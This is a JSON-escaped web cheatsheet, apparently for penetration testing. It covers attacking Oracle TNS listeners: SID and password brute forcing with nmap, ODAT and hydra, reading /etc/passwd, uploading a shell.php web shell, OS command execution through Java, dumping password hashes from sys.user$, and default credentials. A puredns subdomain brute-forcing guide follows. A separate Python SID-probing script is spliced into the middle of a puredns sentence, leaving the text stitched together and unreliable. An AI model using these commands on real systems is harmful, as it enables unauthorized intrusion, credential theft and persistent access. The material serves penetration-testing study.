id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-tns-version \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap 
-p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-sid-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-brute-stealth \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-enum-users \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args oracle-enum-users.sid\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"odat-oracle-database-attacking-tool\"\u003eODAT (Oracle Database Attacking Tool)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full automated scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat all -s \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 
style=\"color:#75715e\"\u003e# SID brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat sidguesser -s \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Password brute force (after getting SID)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat passwordguesser -s \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e -d \u0026lt;sid\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# File read/write (requires UTL_FILE privilege)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc/passwd /tmp/passwd.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --putFile /tmp shell.php shell.php\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# OS command execution (requires Java)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat java -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P 
\u0026lt;pass\u0026gt; --exec \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;whoami\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# External table method for file read (args: remote dir, remote file, local file)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat externaltable -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc passwd /tmp/passwd.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"sqlplus-direct-connection\"\u003esqlplus (Direct Connection)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Install: sudo apt install oracle-instantclient-sqlplus\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt; as sysdba\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003esqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@//\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;service_name\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-sids-to-try\"\u003eCommon SIDs to Try\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eXE          ORCL        DB          DATABASE\nPROD        TEST        DEV         ORACLE\nOEMREP      ORACLR_CONNECTION_DATA\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"enumeration-queries-once-connected\"\u003eEnumeration Queries (Once Connected)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Version and user\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e v$version;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dual;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e session_privs;\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Database objects\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e all_tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eowner\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e all_tables \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eowner\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e!=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003ecolumn_name\u003c/span\u003e, data_type \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e all_tab_columns \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;TABLE\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Users and 
privileges\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e username \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dba_users;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e user_role_privs;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dba_sys_privs \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e grantee \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;user\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Password hashes (as SYSDBA)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name, password \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e\u003cspan style=\"color:#960050;background-color:#1e0010\"\u003e$\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name, spare4 \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.\u003cspan 
style=\"color:#66d9ef\"\u003euser\u003c/span\u003e\u003cspan style=\"color:#960050;background-color:#1e0010\"\u003e$\u003c/span\u003e;    \u003cspan style=\"color:#75715e\"\u003e-- SHA-1 hashes (11g+)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check for DBA role\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e session_privs \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e privilege \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;CREATE SESSION\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"privilege-escalation-via-java\"\u003ePrivilege Escalation via Java\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Grant Java permissions (as DBA)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e dbms_java.grant_permission(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SCOTT\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS:java.io.FilePermission\u0026#39;\u003c/span\u003e, \u003cspan 
style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;\u0026lt;ALL FILES\u0026gt;\u0026gt;\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;execute\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e dbms_java.grant_permission(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SCOTT\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS:java.lang.RuntimePermission\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;writeFileDescriptor\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e dbms_java.grant_permission(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SCOTT\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS:java.lang.RuntimePermission\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;readFileDescriptor\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Execute OS command via Java\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e dbms_java.runjava(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;oracle/aurora/util/Wrapper /bin/bash -c \u0026#34;id \u0026gt; /tmp/out\u0026#34;\u0026#39;\u003c/span\u003e) \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e 
dual;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e oracle://\u0026lt;ip\u0026gt;/\u0026lt;sid\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-brute \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args oracle-brute.sid\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"default-credentials\"\u003eDefault 
Credentials\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eUsername\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003ePassword\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eNotes\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003esys\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003echange_on_install\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003esysdba\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003esystem\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003emanager\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003escott\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003etiger\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eClassic demo user\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003edbsnmp\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003edbsnmp\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSNMP agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003emdsys\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003emdsys\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ehr\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ehr\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e","title":"Oracle TNS"},{"content":"puredns Cheatsheet Type: Powerful DNS brute-forcing and resolution tool — filters wildcard results effectively at scale\nInstallation go install github.com/d3mondev/puredns/v2@latest # Binary ends up in ~/go/bin/puredns # Also requires massdns (dependency for fast resolution) git clone https://github.com/blechschmidt/massdns.git cd massdns \u0026amp;\u0026amp; make sudo cp bin/massdns /usr/local/bin/ Modes Mode Description bruteforce Brute force subdomains using a wordlist resolve Resolve a list of 
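What `oracle-tns-version` and `oracle-sid-brute` (and ODAT's `sidguesser`) actually do on the wire is a single TNS CONNECT round trip: the listener's REFUSE packet leaks its version in `VSNNUM`, and the error code tells a wrong SID (ORA-12505 / ORA-12514) apart from a right one. The Python below is an added example written for this page; it is not code from the cheatsheet, nmap or ODAT. The PROGRAM/HOST/USER strings in the connect descriptor are placeholders, and the REFUSE packets produced by `build_refuse()` are constructed test data standing in for a real listener's reply.

```python
"""Minimal Oracle TNS probe: the wire-level check behind oracle-tns-version and
oracle-sid-brute. Added example, not code from the cheatsheet, nmap or ODAT.
Assumptions: PROGRAM/HOST/USER in the connect descriptor are placeholders, and
build_refuse() fabricates listener replies so the logic can be exercised offline."""
import re
import socket
import struct
from typing import Dict, Optional, Tuple

# TNS packet types (byte 4 of the 8-byte header)
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
# ORA-12505 "listener does not know of SID", ORA-12514 "...of service": SID is wrong
SID_UNKNOWN_ERRORS = {12505, 12514}


def build_connect(host: str, port: int, sid: str) -> bytes:
    """Build a TNS CONNECT packet whose connect descriptor names `sid`."""
    descriptor = (
        f"(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=probe)(USER=probe)))"
        f"(ADDRESS=(PROTOCOL=TCP)(HOST={host})(PORT={port})))"
    ).encode()
    offset = 8 + 50                      # header + fixed connect body
    body = struct.pack(
        ">HHHHHHHHHH",
        310, 300,                        # TNS version, lowest compatible version
        0x0C41, 8192, 0x7FFF, 0x4F98,    # service options, SDU, TDU, NT characteristics
        0, 0x0100,                       # line turnaround, "value of 1" in hardware order
        len(descriptor), offset,         # connect data length and offset
    )
    body += struct.pack(">I", 2048)      # max receivable connect data
    body += b"\x41\x41"                  # ANO flags
    body += b"\x00" * 24                 # trace cross-facility ids, unique connection id
    header = struct.pack(">HHBBH", offset + len(descriptor), 0, TNS_CONNECT, 0, 0)
    return header + body + descriptor


def build_refuse(descriptor: str) -> bytes:
    """Constructed REFUSE packet (type 4) for offline testing; real listeners send these."""
    data = descriptor.encode()
    header = struct.pack(">HHBBH", 12 + len(data), 0, TNS_REFUSE, 0, 0)
    return header + b"\x22\x00" + struct.pack(">H", len(data)) + data


def parse_tns(packet: bytes) -> Tuple[int, Dict[str, str]]:
    """Return (packet type, leaf key=value pairs of the descriptor in the payload)."""
    if len(packet) < 8:
        raise ValueError("short TNS packet")
    ptype = packet[4]
    if ptype == TNS_REFUSE:              # user reason, system reason, data length, data
        payload = packet[12:12 + struct.unpack(">H", packet[10:12])[0]]
    elif ptype == TNS_REDIRECT:          # data length, data
        payload = packet[10:10 + struct.unpack(">H", packet[8:10])[0]]
    else:
        payload = b""
    pairs = re.findall(rb"\((\w+)=([^()]*)\)", payload)
    return ptype, {k.decode(): v.decode(errors="replace") for k, v in pairs}


def decode_vsnnum(vsnnum: int) -> str:
    """VSNNUM packs the version into 32 bits: 0x0B200400 -> 11.2.0.4.0."""
    h = f"{vsnnum:08x}"
    return ".".join(str(int(p, 16)) for p in (h[0:2], h[2], h[3], h[4:6], h[6:8]))


def sid_known(ptype: int, fields: Dict[str, str]) -> Optional[bool]:
    """True if the listener recognised the SID, False if not, None if undecidable."""
    if ptype in (TNS_ACCEPT, TNS_REDIRECT):
        return True
    if ptype == TNS_REFUSE:
        err = int(fields.get("ERR") or fields.get("CODE") or 0)
        return None if err == 0 else err not in SID_UNKNOWN_ERRORS
    return None                          # RESEND and anything else: need another round trip


def probe(host: str, port: int, sid: str, timeout: float = 5.0) -> Tuple[Optional[bool], Optional[str]]:
    """One CONNECT exchange; returns (sid_known, listener version). Touches the network."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        pkt = build_connect(host, port, sid)
        s.sendall(pkt)
        ptype, fields = parse_tns(s.recv(4096))
        if ptype == TNS_RESEND:          # listener wants the same CONNECT sent again
            s.sendall(pkt)
            ptype, fields = parse_tns(s.recv(4096))
    version = decode_vsnnum(int(fields["VSNNUM"])) if "VSNNUM" in fields else None
    return sid_known(ptype, fields), version


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for candidate in ("XE", "ORCL", "DB", "DATABASE", "PROD", "TEST", "DEV"):
        known, version = probe(target, 1521, candidate)
        print(f"{candidate:<10} known={known}  listener={version}")
```

Run it as `python3 tns_probe.py <ip>` against a listener on 1521 to walk the "Common SIDs to Try" list. A REFUSE with any error other than 12505/12514 (for example 12519, no handler available) still means the listener knows the SID, which is why the check is on the error code rather than on the packet type alone; a RESEND is answered by repeating the CONNECT, since listeners send it before deciding on the SID.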
domains/subdomains Basic Usage # Brute force puredns bruteforce wordlist.txt example.com # Resolve a list of subdomains puredns resolve subdomains.txt Common Flags Flag Description -r \u0026lt;file\u0026gt; Resolver list file (required for speed) --resolvers-trusted \u0026lt;file\u0026gt; Trusted resolvers for wildcard detection -l \u0026lt;n\u0026gt; Rate limit (queries per second) --bin \u0026lt;path\u0026gt; Path to massdns binary -w \u0026lt;file\u0026gt; Write valid results to file --wildcard-tests \u0026lt;n\u0026gt; Number of wildcard tests per domain (default: 10) --wildcard-batch \u0026lt;n\u0026gt; Subdomains to test per batch --skip-wildcard-filter Skip wildcard filtering --skip-validation Skip validation step -t \u0026lt;n\u0026gt; Massdns threads -q Quiet mode -v Verbose Common Commands # Basic brute force with resolver list puredns bruteforce wordlist.txt example.com -r resolvers.txt # Brute force with rate limiting puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ -l 1000 # Brute force with trusted resolvers for wildcard detection puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ --resolvers-trusted trusted.txt # Save results to file puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ -w results.txt # Resolve a list of subdomains puredns resolve subdomains.txt -r resolvers.txt # Resolve and save valid results puredns resolve subdomains.txt -r resolvers.txt -w resolved.txt # Skip wildcard filter (if you want all results) puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ --skip-wildcard-filter # Quiet output (subdomains only to stdout) puredns bruteforce wordlist.txt example.com -r resolvers.txt -q Resolver Lists Public resolver lists are essential for speed and accuracy:\n# Download fresh public resolvers wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt # Trusted resolvers (for wildcard detection — use well-known ones) cat trusted.txt # 8.8.8.8 # 8.8.4.4 # 
